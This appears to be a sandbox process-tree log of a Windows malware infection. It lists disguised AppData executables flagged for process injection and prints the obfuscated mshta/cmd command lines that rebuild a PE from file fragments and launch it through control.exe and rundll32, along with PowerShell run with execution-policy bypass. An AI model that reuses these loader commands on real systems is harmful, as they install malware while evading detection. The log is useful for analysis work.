C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Roaming\jjehjsaC:\Users\Admin\AppData\Roaming\jjehjsa2⤵
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\iuehjsaC:\Users\Admin\AppData\Roaming\iuehjsa2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\iuehjsaC:\Users\Admin\AppData\Roaming\iuehjsa3⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Checks BIOS information in registry
-
C:\Users\Admin\AppData\Roaming\jjehjsaC:\Users\Admin\AppData\Roaming\jjehjsa2⤵
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\iuehjsaC:\Users\Admin\AppData\Roaming\iuehjsa2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\iuehjsaC:\Users\Admin\AppData\Roaming\iuehjsa3⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Checks BIOS information in registry
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Checks BIOS information in registry
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Checks BIOS information in registry
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Roaming\jjehjsaC:\Users\Admin\AppData\Roaming\jjehjsa2⤵
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\iuehjsaC:\Users\Admin\AppData\Roaming\iuehjsa2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\iuehjsaC:\Users\Admin\AppData\Roaming\iuehjsa3⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Checks BIOS information in registry
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Checks BIOS information in registry
-
C:\Users\Admin\AppData\Roaming\iuehjsaC:\Users\Admin\AppData\Roaming\iuehjsa2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\iuehjsaC:\Users\Admin\AppData\Roaming\iuehjsa3⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\jjehjsaC:\Users\Admin\AppData\Roaming\jjehjsa2⤵
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\jjehjsaC:\Users\Admin\AppData\Roaming\jjehjsa2⤵
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\iuehjsaC:\Users\Admin\AppData\Roaming\iuehjsa2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\iuehjsaC:\Users\Admin\AppData\Roaming\iuehjsa3⤵
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Checks BIOS information in registry
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\jjehjsaC:\Users\Admin\AppData\Roaming\jjehjsa2⤵
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\iuehjsaC:\Users\Admin\AppData\Roaming\iuehjsa2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\iuehjsaC:\Users\Admin\AppData\Roaming\iuehjsa3⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Checks BIOS information in registry
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Checks BIOS information in registry
-
C:\Users\Admin\AppData\Local\Temp\F457.exeC:\Users\Admin\AppData\Local\Temp\F457.exe1⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBSCrIpT: clOse( CreatEoBJECT ( "wsCrIpT.SheLl").RUn ("C:\Windows\system32\cmd.exe /C tYPE ""C:\Users\Admin\AppData\Local\Temp\F457.exe"" > nDRwKPXQhM.EXe &&STARt nDRWKpXQhM.ExE /p7DthEYNU7NMLXbDwjExstCKI1T & If """" == """" for %Y IN ( ""C:\Users\Admin\AppData\Local\Temp\F457.exe"" ) do taskkill -Im ""%~NxY"" /f ", 0 , TrUe ) )2⤵
- Modifies Internet Explorer settings
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C tYPE "C:\Users\Admin\AppData\Local\Temp\F457.exe" > nDRwKPXQhM.EXe &&STARt nDRWKpXQhM.ExE /p7DthEYNU7NMLXbDwjExstCKI1T &If ""== "" for %Y IN ( "C:\Users\Admin\AppData\Local\Temp\F457.exe" ) do taskkill -Im "%~NxY" /f3⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\nDRwKPXQhM.EXenDRWKpXQhM.ExE /p7DthEYNU7NMLXbDwjExstCKI1T4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBSCrIpT: clOse( CreatEoBJECT ( "wsCrIpT.SheLl").RUn ("C:\Windows\system32\cmd.exe /C tYPE ""C:\Users\Admin\AppData\Local\Temp\nDRwKPXQhM.EXe"" > nDRwKPXQhM.EXe &&STARt nDRWKpXQhM.ExE /p7DthEYNU7NMLXbDwjExstCKI1T & If ""/p7DthEYNU7NMLXbDwjExstCKI1T "" == """" for %Y IN ( ""C:\Users\Admin\AppData\Local\Temp\nDRwKPXQhM.EXe"" ) do taskkill -Im ""%~NxY"" /f ", 0 , TrUe ) )5⤵
- Modifies Internet Explorer settings
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C tYPE "C:\Users\Admin\AppData\Local\Temp\nDRwKPXQhM.EXe" > nDRwKPXQhM.EXe &&STARt nDRWKpXQhM.ExE /p7DthEYNU7NMLXbDwjExstCKI1T &If "/p7DthEYNU7NMLXbDwjExstCKI1T "== "" for %Y IN ( "C:\Users\Admin\AppData\Local\Temp\nDRwKPXQhM.EXe" ) do taskkill -Im "%~NxY" /f6⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbSCRIPt: clOse ( CrEateOBJeCT ( "wscriPT.shElL" ).RuN( "cMd /Q /c ECho | sEt /p = ""MZ"" > ~IPT1qBT.OO0 &cOpy /b /Y ~iPT1QBT.OO0+ FYXY.~BG + AePh.D16 08paVA.D& staRT control.exe .\08pAVA.D & DEl FYXY.~Bg aEPh.D16 ~ipT1qBT.oO0 " , 0 ,tRuE ) )5⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /c ECho | sEt /p = "MZ" > ~IPT1qBT.OO0&cOpy /b /Y ~iPT1QBT.OO0+ FYXY.~BG + AePh.D16 08paVA.D&staRT control.exe .\08pAVA.D&DEl FYXY.~Bg aEPh.D16 ~ipT1qBT.oO06⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" ECho "7⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" sEt /p = "MZ" 1>~IPT1qBT.OO0"7⤵
-
C:\Windows\SysWOW64\control.execontrol.exe .\08pAVA.D7⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\08pAVA.D8⤵
- Loads dropped DLL
-
C:\Windows\system32\RunDll32.exeC:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\08pAVA.D9⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\08pAVA.D10⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\taskkill.exetaskkill -Im "F457.exe" /f4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\FABE.exeC:\Users\Admin\AppData\Local\Temp\FABE.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\366.exeC:\Users\Admin\AppData\Local\Temp\366.exe1⤵
- Executes dropped EXE
- Modifies system certificate store
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1308 -s 8922⤵
- Loads dropped DLL
- Program crash
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\5CFC.exeC:\Users\Admin\AppData\Local\Temp\5CFC.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\5CFC.exeC:\Users\Admin\AppData\Local\Temp\5CFC.exe2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -ep bypass -noexit3⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\B163.exeC:\Users\Admin\AppData\Local\Temp\B163.exe1⤵
- Suspicious behavior: GetForegroundWindowSpam
-
C:\Users\Admin\AppData\Local\Temp\D5E5.exeC:\Users\Admin\AppData\Local\Temp\D5E5.exe1⤵
- Suspicious use of AdjustPrivilegeToken
-
